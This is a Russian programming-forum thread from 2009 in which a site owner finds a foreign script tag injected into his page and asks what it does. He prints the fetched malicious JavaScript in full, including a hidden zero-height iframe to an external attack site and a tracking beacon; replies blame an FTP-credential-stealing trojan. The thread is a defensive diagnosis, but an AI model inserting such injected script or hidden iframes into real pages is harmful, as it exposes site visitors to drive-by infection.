Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Скриптовые языки программирования > PHP
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 28.03.2009, 15:49   #1
Stanislav
Квадрокоптерист
Участник клуба Подтвердите свой е-майл
 
Регистрация: 29.09.2007
Сообщений: 1,824
По умолчанию Взлом?

Здравствуйте.

Сегодня я обнаружил такой странный код:

Оригинальный:
Код:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />
<link rel="stylesheet" href="style.css" type="text/css"/>
<link rel="icon" href="favicon.ico" type="image/x-icon">
<link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
</head>
Обнаруженный:

Код:
<script language=javascript src=http://www.1408.pl/img/msn.gif></script>                                                 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />
<link rel="stylesheet" href="style.css" type="text/css"/>
<link rel="icon" href="favicon.ico" type="image/x-icon">
<link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
</head>
т.е лишним является:

Код:
<script language=javascript src=http://www.1408.pl/img/msn.gif></script>
перейдя по ссылки

Код:
http://www.1408.pl/img/msn.gif
получил это:

Код:
function Get(){
var Then = new Date() 
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1=" 
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){ 
} else 
{ document.cookie = "Cookie1=risb;expires="+ Then.toGMTString()
document.writeln("<IFRaME src=\"http://www.kaishi2009.com/set4.htm\" width=100 height=0><\/IFRAME>");
// A Popular Free Statistics Service for 200 000+ Webmasters. 
var a8520tf="51la";var a8520pu="";var a8520pf="51la";var a8520su=window.location;var a8520sf=document.referrer;var a8520of="";var a8520op="";var a8520ops=1;var a8520ot=1;var a8520d=new Date();var a8520color="";if (navigator.appName=="Netscape"){a8520color=screen.pixelDepth;} else {a8520color=screen.colorDepth;}
try{a8520tf=top.document.referrer;}catch(e){}
try{a8520pu =window.parent.location;}catch(e){}
try{a8520pf=window.parent.document.referrer;}catch(e){}
try{a8520ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a8520ops=(a8520ops==null)?1: (parseInt(unescape((a8520ops)[2]))+1);var a8520oe =new Date();a8520oe.setTime(a8520oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a8520ops+ ";path=/;expires="+a8520oe.toGMTString();a8520ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a8520ot==null){a8520ot=1;}else{a8520ot=parseInt(unescape((a8520ot)[2])); a8520ot=(a8520ops==1)?(a8520ot+1):(a8520ot);}a8520oe.setTime(a8520oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a8520ot+";path=/;expires="+a8520oe.toGMTString();}catch(e){}
a8520of=a8520sf;if(a8520pf!=="51la"){a8520of=a8520pf;}if(a8520tf!=="51la"){a8520of=a8520tf;}a8520op=a8520pu;try{lainframe}catch(e){a8520op=a8520su;}document.write('<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=33&id=2618520&tpages='+a8520ops+'&ttimes='+a8520ot+'&tzone='+(0-a8520d.getTimezoneOffset()/60)+'&tcolor='+a8520color+'&sSize='+screen.width+','+screen.height+'&referrer='+escape(a8520of)+'&vpage='+escape(a8520op)+'" />');
}
}Get();

Вопрос номер один: Что это? кто-то пытался стянуть кукисы?
Вопрос номер два: Как они залили эту чертовщину в скрипт?

Ну если не трудно, кто знает, расскажите об этом коде...
Я часть той силы, что вечно хочет зла, но вечно совершает благо..
Stanislav вне форума Ответить с цитированием
Старый 28.03.2009, 16:15   #2
wyvern
Форумчанин
 
Аватар для wyvern
 
Регистрация: 24.03.2009
Сообщений: 215
По умолчанию

document.writeln("<IFRaME src=\"http://www.kaishi2009.com/set4.htm\" width=100 height=0><\/IFRAME>");

плавающий фрейм с нулевой высотой - наводит сомнения о доброжелательности сайта...

Вообще самый популярный вид взлома провайдера - троян, который вытягивает открыто хранящийся пароль из фтп-клиента и правит все индексные файлы, которые обнаруживает. Таким образом конечные пользователи сайта получают свои трояны. Все это противно и нехорошо.

Способов взлома огромное количество, и о примененном в данном случае можно только гадать.

У нас однажды все индексные файлы на всем сервере исправили на фигню какую-то. Так и не нашли дыру...
wyvern@localhost:~$ sudo emerge --unmerge world
wyvern вне форума Ответить с цитированием
Старый 28.03.2009, 16:22   #3
Stanislav
Квадрокоптерист
Участник клуба Подтвердите свой е-майл
 
Регистрация: 29.09.2007
Сообщений: 1,824
По умолчанию

Цитата:
Сообщение от wyvern Посмотреть сообщение
document.writeln("<IFRaME src=\"http://www.kaishi2009.com/set4.htm\" width=100 height=0><\/IFRAME>");

плавающий фрейм с нулевой высотой - наводит сомнения о доброжелательности сайта...
Честно говоря, мне так кажеться доброжелательностью здесь и не пахнет, смущают фразы про Cookie..
Я часть той силы, что вечно хочет зла, но вечно совершает благо..
Stanislav вне форума Ответить с цитированием
Старый 29.03.2009, 12:30   #4
SkyM@n
Laravel/Vue expert
Старожил Подтвердите свой е-майл
 
Аватар для SkyM@n
 
Регистрация: 08.08.2007
Сообщений: 2,832
По умолчанию

Имхо, вы пользуетесь тотал коммандером при доступе на ФТП, а троян украл пароли доступа к ФТП из файла настроек этого тотал коммандера. Часто такое случается..
SkyM@n вне форума Ответить с цитированием
Старый 01.04.2009, 00:34   #5
Stanislav
Квадрокоптерист
Участник клуба Подтвердите свой е-майл
 
Регистрация: 29.09.2007
Сообщений: 1,824
По умолчанию

имхо конечно, ну думаю что если бы утянули пароли от тотола, было бы все намного серьезнее там ведь пароли к бд.... тем более я уточнял у хостера он дал логи по входу... там только мои ip...
а по безопасности что лучше юзать в место тотола?
Я часть той силы, что вечно хочет зла, но вечно совершает благо..
Stanislav вне форума Ответить с цитированием
Старый 01.04.2009, 01:55   #6
memka
Пользователь
 
Аватар для memka
 
Регистрация: 31.03.2009
Сообщений: 71
По умолчанию

не сохранять пароли! записать на бумажку и прилипнуть на монитор! :-)
я новичок в php
memka вне форума Ответить с цитированием
Старый 01.04.2009, 09:42   #7
SkyM@n
Laravel/Vue expert
Старожил Подтвердите свой е-майл
 
Аватар для SkyM@n
 
Регистрация: 08.08.2007
Сообщений: 2,832
По умолчанию

Цитата:
имхо конечно, ну думаю что если бы утянули пароли от тотола, было бы все намного серьезнее там ведь пароли к бд
не факт - это ведь не люди, а вредоносная программа пользуется кодом к ФТП и та же программа (или ее другая часть) через ФТП инклюдит в сайт-жертву в конец кода вредоносный скрипт (обычно - на все php-страницы в корневом каталоге)
SkyM@n вне форума Ответить с цитированием
Старый 01.04.2009, 22:41   #8
Stanislav
Квадрокоптерист
Участник клуба Подтвердите свой е-майл
 
Регистрация: 29.09.2007
Сообщений: 1,824
По умолчанию

Цитата:
Сообщение от memka Посмотреть сообщение
не сохранять пароли! записать на бумажку и прилипнуть на монитор! :-)
не факт если пароль тянет троян он может его и во время подключения утянуть...

SkyM@n, често говоря мне уже все равно как они туда его залили, меня по большей части интересует что они залили....
Я часть той силы, что вечно хочет зла, но вечно совершает благо..
Stanislav вне форума Ответить с цитированием
Старый 02.04.2009, 01:33   #9
DomiNick
Студент, не
Старожил
 
Аватар для DomiNick
 
Регистрация: 29.01.2009
Сообщений: 2,067
Счастье

З.Ы. Интересненько...

Поизучал - говорят сайт, адрес которого во фрейме вируса, "используется для атак на компьютеры"...
Если кому интересно - сделал пару скринов...
I am the First of Cyber Evolution...
I am the First to Program your Future...
DomiNick вне форума Ответить с цитированием
Старый 02.04.2009, 08:20   #10
wyvern
Форумчанин
 
Аватар для wyvern
 
Регистрация: 24.03.2009
Сообщений: 215
По умолчанию

троян не должен "утягивать пароль". троян скорее всего с твоего же компа и отработал. под твоим же айпишником.
wyvern@localhost:~$ sudo emerge --unmerge world
wyvern вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом программы!!! Александр! Безопасность, Шифрование 7 27.01.2009 17:46
Взлом тестодела!!!!! СергейСАЛЬСК Помощь студентам 14 24.01.2009 00:05
Взлом установщика JamS007 Безопасность, Шифрование 4 22.12.2008 22:06
Взлом Sk!f Безопасность, Шифрование 14 19.09.2008 16:24